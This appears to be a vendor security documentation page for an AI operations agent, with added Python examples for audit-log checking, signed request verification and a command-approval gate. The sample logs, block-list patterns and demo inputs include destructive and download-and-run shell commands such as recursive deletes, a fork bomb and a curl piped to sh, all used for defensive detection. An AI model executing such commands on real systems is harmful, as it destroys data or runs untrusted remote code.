Security

Understanding the OpsSquad security model

Security is a foundational principle in OpsSquad. Since agents execute commands on your production infrastructure, we've built multiple layers of protection to keep your systems safe.

Security Philosophy

OpsSquad is built from the ground up to meet the stringent security and compliance requirements of modern enterprises. We don't just monitor your infrastructure; we protect it through four key pillars:

Core Security Features

1. TLS Encrypted Sockets

Secure Transport

All communications, whether agent command traffic or platform data, use TLS-encrypted sockets so that nothing leaks in transit. Data is also kept secure at rest, so it stays confidential end to end.

2. Proprietary SLM AI Guardrails

Intelligent Intent Filtering

A proprietary SLM (Small Language Model) classifies terminal commands and blocks dangerous ones before they run. Unlike a static allowlist or regex rules, it filters on intent and context, so a dangerous action does not slip through just because it is spelled differently. The classifier is one layer, not the only control: non-read-only commands still require explicit user permission (see Permission-Based Execution below).

3. Permission-Based Execution

Verified User Control

The system requires explicit user permission before an agent executes any non-read-only command. This human-in-the-loop step prevents misaligned automated operations: you see, and decide on, everything the agent does on your server.

4. Continuous Security Layering

Defense in Depth

Security layers are added continuously, and together they limit the blast radius of agent mistakes and hallucinations, keeping your operational environment stable and predictable. Current layers include resource limits, timeout constraints, and proactive monitoring of agent behavior.

Audit Logging

Every action is logged:

Logged Events

Event                   Details captured
Command Execution       Command, args, timestamp, user
Approval Decision       Approved/denied, who, when
Connection Events       Connect, disconnect, errors
Configuration Changes   What changed, who, when

Audit Log Format

{
  "timestamp": "2024-01-15T10:30:00Z",
  "event_type": "COMMAND_EXECUTED",
  "agent_id": "agent_abc123",
  "cluster_id": "cluster_xyz789",
  "user_id": "user_def456",
  "command": "ps aux",
  "result": "success",
  "execution_time_ms": 150
}
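Audit logs are only useful if someone reads them, and the permission rule above gives a concrete property to check: every non-read-only execution should be preceded by an approval. As an added example (not OpsSquad's own tooling), the script below reads an export in the documented format and reports executions that break that rule. The APPROVAL_DECISION event type and its decision field, the sample log lines, the read-only command list and the ten-minute approval window are all assumptions made for this example; map them onto the fields your export actually contains.

```python
import json
from datetime import datetime, timedelta

# Constructed sample export in JSON Lines. COMMAND_EXECUTED rows follow the
# documented format; the APPROVAL_DECISION rows and their "decision" field are
# an assumption of this example.
SAMPLE_AUDIT_LOG = """\
{"timestamp": "2024-01-15T10:30:00Z", "event_type": "COMMAND_EXECUTED", "agent_id": "agent_abc123", "cluster_id": "cluster_xyz789", "user_id": "user_def456", "command": "ps aux", "result": "success", "execution_time_ms": 150}
{"timestamp": "2024-01-15T10:31:00Z", "event_type": "APPROVAL_DECISION", "agent_id": "agent_abc123", "cluster_id": "cluster_xyz789", "user_id": "user_def456", "command": "systemctl restart nginx", "decision": "approved"}
{"timestamp": "2024-01-15T10:31:05Z", "event_type": "COMMAND_EXECUTED", "agent_id": "agent_abc123", "cluster_id": "cluster_xyz789", "user_id": "user_def456", "command": "systemctl restart nginx", "result": "success", "execution_time_ms": 2100}
{"timestamp": "2024-01-15T10:40:00Z", "event_type": "APPROVAL_DECISION", "agent_id": "agent_abc123", "cluster_id": "cluster_xyz789", "user_id": "user_def456", "command": "rm -rf /var/log/nginx", "decision": "denied"}
{"timestamp": "2024-01-15T10:40:30Z", "event_type": "COMMAND_EXECUTED", "agent_id": "agent_abc123", "cluster_id": "cluster_xyz789", "user_id": "user_def456", "command": "rm -rf /var/log/nginx", "result": "success", "execution_time_ms": 40}
{"timestamp": "2024-01-15T11:00:00Z", "event_type": "COMMAND_EXECUTED", "agent_id": "agent_abc123", "cluster_id": "cluster_xyz789", "user_id": "user_def456", "command": "chmod 777 /etc/shadow", "result": "success", "execution_time_ms": 12}
"""

# Assumed list of commands the permission rule treats as read-only.
READ_ONLY_COMMANDS = {"ps", "ls", "cat", "df", "free", "uptime", "journalctl"}
# Shell operators that let a "read-only" command do more than read.
SHELL_OPERATORS = (";", "&&", "||", "|", ">", "$(", "`")
# Assumed: an approval only covers an execution that follows within this window.
APPROVAL_WINDOW = timedelta(minutes=10)


def parse_events(text):
    """Parse JSON Lines into dicts, sorted by timestamp."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        ev["_ts"] = datetime.strptime(ev["timestamp"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(ev)
    events.sort(key=lambda e: e["_ts"])
    return events


def is_read_only(command):
    """A single read-only command with no operator that could chain a write."""
    words = command.split()
    return bool(words) and words[0] in READ_ONLY_COMMANDS \
        and not any(op in command for op in SHELL_OPERATORS)


def find_policy_violations(text, window=APPROVAL_WINDOW):
    """Return (finding, timestamp, command) tuples for executions that break
    the permission rule: a non-read-only command ran without a fresh approval,
    or ran even though the approval was denied."""
    findings = []
    pending = {}  # (agent_id, command) -> most recent approval decision
    for ev in parse_events(text):
        key = (ev["agent_id"], ev["command"])
        if ev["event_type"] == "APPROVAL_DECISION":
            pending[key] = ev
        elif ev["event_type"] == "COMMAND_EXECUTED" and not is_read_only(ev["command"]):
            decision = pending.get(key)
            if decision is None or ev["_ts"] - decision["_ts"] > window:
                findings.append(("executed_without_approval", ev["timestamp"], ev["command"]))
            elif decision["decision"] != "approved":
                findings.append(("executed_after_denial", ev["timestamp"], ev["command"]))
            else:
                pending.pop(key)  # one approval covers exactly one execution
    return findings


if __name__ == "__main__":
    for finding in find_policy_violations(SAMPLE_AUDIT_LOG):
        print(*finding)
```

Run it against the sample and two lines come back: the rm after a denial and the chmod with no approval at all; the approved nginx restart and the read-only ps aux are silent. Consuming the approval on use means a second run of an approved command is flagged too, which is the behaviour you want from a one-shot approval.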

Log Retention

  • Logs retained for 90 days (default)
  • Export available for compliance
  • Extended retention on enterprise plans

Authentication & Authorization

Agent Authentication

Agents authenticate using:

  • Agent ID - Identifies the agent
  • API Key - Secret authentication token
  • Request IDs - Prevent replay attacks
  • Timestamps - Prevent stale requests
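The four credentials above only help if they are bound together: a request ID or timestamp that the authentication does not cover can be rewritten by whoever intercepts the request, and then neither replay nor staleness is actually prevented. The following is an added example of a platform-side verifier that enforces that binding; it is not OpsSquad's protocol. It assumes the API key is used as an HMAC-SHA256 key over the agent ID, request ID, timestamp and body, a 300-second skew window, and the header names shown; the sample key is constructed for illustration.

```python
import hashlib
import hmac
import secrets
import time

# Assumed skew window: requests whose timestamp is further from server time are stale.
SKEW_SECONDS = 300

# Constructed sample key store (agent_id -> API key). A real deployment keeps this
# in a secrets manager; the key below is a placeholder for this example only.
API_KEYS = {"agent_abc123": b"constructed-demo-key-do-not-use"}


def _message(agent_id, request_id, timestamp, body):
    """Canonical byte string covered by the MAC. Fields are length-prefixed so
    that different (agent, request, timestamp, body) tuples never concatenate
    to the same bytes."""
    parts = [agent_id.encode(), request_id.encode(), str(timestamp).encode(), body]
    return b"".join(len(p).to_bytes(4, "big") + p for p in parts)


def sign_request(agent_id, api_key, body, request_id=None, timestamp=None):
    """Agent side: build the authentication headers for one request.
    A fresh random request ID makes every request unique."""
    request_id = request_id or secrets.token_hex(16)
    timestamp = int(time.time()) if timestamp is None else timestamp
    mac = hmac.new(api_key, _message(agent_id, request_id, timestamp, body),
                   hashlib.sha256).hexdigest()
    return {
        "X-Agent-Id": agent_id,
        "X-Request-Id": request_id,
        "X-Timestamp": str(timestamp),
        "X-Signature": mac,
    }


class RequestVerifier:
    """Platform side: authenticate the agent, then reject stale and replayed requests."""

    def __init__(self, keys, skew=SKEW_SECONDS):
        self.keys = keys
        self.skew = skew
        self.seen = {}  # request_id -> time after which the entry can be forgotten

    def verify(self, headers, body, now=None):
        now = int(time.time()) if now is None else now
        agent_id = headers.get("X-Agent-Id", "")
        key = self.keys.get(agent_id)
        if key is None:
            return "unknown_agent"
        try:
            ts = int(headers.get("X-Timestamp", ""))
        except ValueError:
            return "bad_timestamp"
        # Stale check first: it is cheap and bounds how long replay state is kept.
        if abs(now - ts) > self.skew:
            return "stale"
        request_id = headers.get("X-Request-Id", "")
        expected = hmac.new(key, _message(agent_id, request_id, ts, body),
                            hashlib.sha256).hexdigest()
        # Constant-time comparison. The MAC covers ID, timestamp and body, so none
        # of them can be altered without the API key.
        if not hmac.compare_digest(expected, headers.get("X-Signature", "")):
            return "bad_signature"
        # Replay check only after authentication, so an attacker cannot fill the
        # cache with unsigned junk. Entries expire once the stale check would
        # reject that timestamp anyway.
        self.seen = {rid: exp for rid, exp in self.seen.items() if exp > now}
        if request_id in self.seen:
            return "replay"
        self.seen[request_id] = ts + self.skew
        return "ok"


if __name__ == "__main__":
    body = b'{"command": "ps aux"}'
    headers = sign_request("agent_abc123", API_KEYS["agent_abc123"], body)
    verifier = RequestVerifier(API_KEYS)
    print(verifier.verify(headers, body))  # ok
    print(verifier.verify(headers, body))  # replay
```

The order of the checks matters: the signature is verified before the replay cache is touched, and the cache only has to remember IDs for as long as the skew window, because anything older is rejected as stale regardless.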

User Authentication

Users authenticate via:

  • Email/password
  • OAuth (Google, GitHub)
  • SSO (enterprise)

Authorization Model

Role     Capabilities
Owner    Full access, billing
Admin    Manage clusters, agents, users
Member   Use chat, view dashboards
Viewer   Read-only access

Network Security

Agent Connections

  • Outbound TCP only (agent initiates)
  • TLS Encrypted Sockets for all traffic
  • Certificate validation
  • No inbound ports required

Platform Infrastructure

  • DDoS protection
  • WAF (Web Application Firewall)
  • Rate limiting
  • IP allowlisting (enterprise)

Permission & Approvals

The Permission-Based Execution system ensures humans control sensitive actions:

When Permission is Required

  • Non-read-only commands
  • Commands affecting services
  • File modifications
  • Any potentially risky operation classified by the SLM

Approval Workflow

  1. Agent proposes an action.
  2. SLM AI Guardrails analyze the intent. Dangerous intents are blocked immediately; anything else proceeds to user review.
  3. System pauses and notifies the user that permission is needed.
  4. User reviews the exact command.
  5. User grants or denies permission.
  6. Command executes only after explicit approval.
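To make the two guardrail stages concrete, here is an added example of the classify-then-approve flow described in the SLM AI Guardrails section and in the workflow above. It is not OpsSquad's code: the proprietary SLM is replaced with a small rule-based classifier (command names, shell operators and a few dangerous patterns, all chosen for this example) so the control flow can be read and run offline. It also shows why a plain allowlist is not enough: `ps aux` is read-only, but `ps aux; rm -rf /var/lib/app`, `cat f > g` and `ls $(...)` are not, even though each starts with an allowlisted word. The gate refuses to execute a non-read-only command without an explicit approver, and a blocked verdict cannot be overridden by approval.

```python
import re
import shlex

# Commands this stand-in treats as read-only (an assumed list, not the SLM's).
READ_ONLY_COMMANDS = {"ps", "ls", "cat", "df", "free", "uptime", "journalctl",
                      "grep", "head", "tail", "wc", "stat"}
# Shell control operators that join simple commands; every part is checked.
CONTROL_OPERATORS = {";", "&&", "||", "|", "&", "(", ")"}
# Patterns this stand-in blocks outright, regardless of approval (assumed).
BLOCKED_PATTERNS = [
    (r"\brm\s+-\S*r\S*\s+/+(\s|$)", "recursive delete of /"),
    (r"\bmkfs(\.\w+)?\b", "filesystem format"),
    (r"\bdd\b.*\bof=/dev/", "raw write to a block device"),
    (r"\b(curl|wget)\b.*\|\s*(sh|bash|zsh)\b", "piping a download into a shell"),
    (r":\(\)\s*\{.*\};\s*:", "fork bomb"),
]


def _segment_is_read_only(tokens):
    """Decide for one simple command (no operators) whether it only reads."""
    name, args = tokens[0], tokens[1:]
    if name == "systemctl":   # read-only only for query subcommands
        return bool(args) and args[0] in {"status", "show", "is-active", "list-units"}
    if name == "find":        # find reads, unless asked to act on matches
        return not any(a in ("-delete", "-exec", "-execdir", "-ok") for a in args)
    return name in READ_ONLY_COMMANDS


def classify(command):
    """Stand-in for the guardrail classifier. Returns (verdict, reason) with
    verdict in {"blocked", "needs_approval", "read_only"}."""
    for pattern, reason in BLOCKED_PATTERNS:
        if re.search(pattern, command):
            return "blocked", reason
    if "$(" in command or "`" in command:
        return "needs_approval", "command substitution hides what will run"
    try:
        tokens = list(shlex.shlex(command, posix=True, punctuation_chars=True))
    except ValueError as exc:
        return "needs_approval", f"unparseable command: {exc}"
    if not tokens:
        return "needs_approval", "empty command"
    segments, current = [], []
    for tok in tokens:
        if tok.startswith(">"):
            return "needs_approval", f"output redirection {tok} writes a file"
        if tok in CONTROL_OPERATORS:
            segments.append(current)
            current = []
        else:
            current.append(tok)
    segments.append(current)
    for seg in segments:
        if seg and not _segment_is_read_only(seg):
            return "needs_approval", f"{seg[0]} is not a read-only command"
    return "read_only", "every part of the command only reads"


def gate(command, approved_by=None, execute=None):
    """Approval gate: run read-only commands directly, run anything else only
    with an explicit approver, and never run a blocked command.
    The executor is injected; nothing is run unless one is supplied."""
    verdict, reason = classify(command)
    if verdict == "blocked":
        return "blocked", reason
    if verdict == "needs_approval" and approved_by is None:
        return "pending_approval", reason
    if execute is not None:
        execute(command)
    return "executed", reason


if __name__ == "__main__":
    for cmd in ["ps aux", "ps aux; rm -rf /var/lib/app", "systemctl restart nginx",
                "curl https://example.com/x.sh | sh"]:
        print(f"{cmd!r}: {gate(cmd)}")
```

Note what the gate does not do: it does not let an approval turn a blocked command into a runnable one, and it does not trust the first word of the command. Everything after an operator, a redirection or a substitution is treated as a separate decision.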

See Approvals for details.

Compliance

OpsSquad supports compliance requirements:

Standard   Support
SOC 2      Audit controls
GDPR       Data handling
HIPAA      Healthcare data (enterprise)
PCI DSS    Payment data (enterprise)

Security Best Practices

For Users

  1. Use strong, unique passwords
  2. Enable two-factor authentication
  3. Review approval requests carefully
  4. Grant permissions sparingly
  5. Review audit logs regularly

For Administrators

  1. Apply the least-privilege principle
  2. Rotate API keys periodically
  3. Monitor for unusual activity
  4. Keep agents updated
  5. Configure alerts for security events

For Organizations

  1. Implement SSO where possible
  2. Define clear access policies
  3. Conduct regular security reviews
  4. Plan for incident response
  5. Employee security training

Reporting Security Issues

If you discover a security vulnerability:

  1. Email: [email protected]
  2. Do not disclose publicly
  3. Provide detailed reproduction steps
  4. We'll respond within 24 hours

We have a responsible disclosure program and reward valid reports.
